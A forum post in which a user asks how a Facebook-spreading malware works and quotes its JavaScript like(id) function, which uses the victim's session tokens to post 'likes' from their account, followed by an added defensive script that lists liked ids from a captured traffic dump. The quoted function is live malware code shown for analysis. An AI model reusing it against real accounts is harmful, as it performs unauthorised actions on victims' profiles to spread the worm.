Hi all,
I'm trying to understand how this malware works. I know that the malware spreads by posting fake video posts on the user's wall and sending chat messages to the user's friends containing a link to the fake video posts. I'm curious about one of the functions within the malware's script that uses the Facebook like feature (see below). Can anyone explain a bit what it does? Does the malware "like" the post that it just created on the user's wall, or does it "like" all the posts it has ever created?
I have also attached a "follow-tcp-flow" Wireshark dump of the malware's communication with its servers.
Thanks!
-lz
--------------excerpt--------------------------------
function like(id) {
    var xmlhttpa = new XMLHttpRequest();
    xmlhttpa.onreadystatechange = function () {
        if (xmlhttpa.readyState == 4) {}
    };
    var params = "like_action=true";
    params += "&ft_ent_identifier=" + id;
    params += "&source=0&client_id=1355581664855%3A2475647505&ft[tn]=%3E%3D&ft[type]=20&nctr[_mod]=pagelet_timeline_recent";
    params += "&fan_origin=page_timeline";
    params += "&__user=" + uid();
    params += "&__req=1e";
    params += "&__dyn=7n8amgAMCBClUlgDxqigHzy5xNei9w";
    params += "&__a=1";
    params += "&fb_dtsg=" + dtsg();
    params += "&phstamp=165816689711057878203";
    xmlhttpa.open("POST", "/ajax/ufi/like.php", true);
    xmlhttpa.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttpa.send(params);
}
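
An added example, not part of the original post: like(id) in the excerpt sends one POST to /ajax/ufi/like.php carrying a single ft_ent_identifier, so which posts get liked depends on the ids its callers pass, and a captured stream shows those ids directly. The sketch below lists them from a follow-TCP-stream text dump; SAMPLE_DUMP, its ids and token values, and the function names are constructed for illustration, and it assumes the form body sits on one line after the request headers.

```javascript
// Added example: list the objects "liked" in a follow-TCP-stream text dump.
// SAMPLE_DUMP is constructed; the ids and token values are placeholders.
const SAMPLE_DUMP = [
  "POST /ajax/ufi/like.php HTTP/1.1",
  "Host: www.facebook.com",
  "Content-Type: application/x-www-form-urlencoded",
  "",
  "like_action=true&ft_ent_identifier=111&source=0&__user=42&__a=1&fb_dtsg=TOKEN",
  "HTTP/1.1 200 OK",
  "",
  "{}",
  "POST /ajax/ufi/like.php HTTP/1.1",
  "Host: www.facebook.com",
  "",
  "like_action=true&ft_ent_identifier=222&source=0&__user=42&__a=1&fb_dtsg=TOKEN",
  "POST /ajax/other.php HTTP/1.1",
  "Host: www.facebook.com",
  "",
  "ft_ent_identifier=333&__user=42",
].join("\r\n");

const LIKE_PATH = "/ajax/ufi/like.php"; // endpoint used by like(id) in the excerpt

// Return one record per POST to LIKE_PATH found in the dump.
function extractLikeRequests(dump) {
  const lines = dump.split(/\r?\n/);
  const found = [];
  for (let i = 0; i < lines.length; i++) {
    const m = /^POST (\S+) HTTP\/1\.[01]$/.exec(lines[i]);
    if (!m || m[1].split("?")[0] !== LIKE_PATH) continue;
    // Skip the request headers; the form body is the line after the blank line.
    let j = i + 1;
    while (j < lines.length && lines[j] !== "") j++;
    const body = new URLSearchParams(lines[j + 1] || "");
    found.push({
      targets: body.getAll("ft_ent_identifier"), // the excerpt sets this once per call
      user: body.get("__user"),
      isLike: body.get("like_action") === "true",
    });
    i = j; // resume scanning at the body line
  }
  return found;
}

// Unique ids that were actually liked, in order of first appearance.
function likedTargets(dump) {
  const ids = extractLikeRequests(dump).filter((r) => r.isLike).flatMap((r) => r.targets);
  return [...new Set(ids)];
}

console.log(likedTargets(SAMPLE_DUMP));
```

Comparing the returned ids with the ids of the posts the script created in the same capture answers whether it likes only the new post or a wider set.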